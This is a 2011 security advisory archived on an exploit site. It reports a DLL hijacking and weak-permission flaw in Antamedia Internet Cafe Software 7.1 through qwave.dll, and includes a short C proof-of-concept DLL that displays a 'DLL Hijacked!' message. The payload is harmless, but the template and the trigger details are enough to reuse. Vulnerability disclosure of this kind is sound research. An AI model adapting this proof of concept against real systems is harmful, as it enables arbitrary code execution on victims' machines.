exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Antamedia Internet Cafe Software 7.1 DLL Hijack

Antamedia Internet Cafe Software 7.1 DLL Hijack
Posted Apr 3, 2011
Authored by LiquidWorm | Site zeroscience.mk

Antamedia Internet Cafe Software version 7.1 suffers from a DLL hijacking vulnerability.

tags | exploit
systems | windows
SHA-256 | 2cfaa2ba266c95b6c2c1ccc52ea1a90642d2fe2083343a19e2517a9131ab83a4

Antamedia Internet Cafe Software 7.1 DLL Hijack

Change Mirror Download
/*

Antamedia Internet Cafe Software 7.1 Insecure Permissions/DLL Loading

Vendor: Antamedia
Product Web Page: http://www.antamediacafe.com
Affected Version: 7.1.1.0

Summary: Internet Cafe Software – Cyber Cafe software is a worldwide top
selling solution for CyberCafe management and game center control. It
protects your computers from unauthorized usage and helps with customer
billing. Many features like POS, print manager, console controller, smart
cards, credit card billing, makes it suitable for any cyber cafe, hotel,
airport terminals, game center.

Desc: Antamedia ICS suffers from a dll hijacking vulnerability and improper
ACL permissions that enables the attacker to execute arbitrary code or change
the binary with another of his/her choice because of the (C)Change perm for the
group Everyone (AICLogin.exe, AICCore.exe). The vulnerable extensions are .fp3
and .swf thru qwave.dll library.


Tested on Microsoft Windows XP Professional SP3 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com

Zero Science Lab - http://www.zeroscience.mk


Advisory ID: ZSL-2011-5005
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5005.php


26.03.2011

*/


#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}

return TRUE;
}

int dll_mll()
{
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close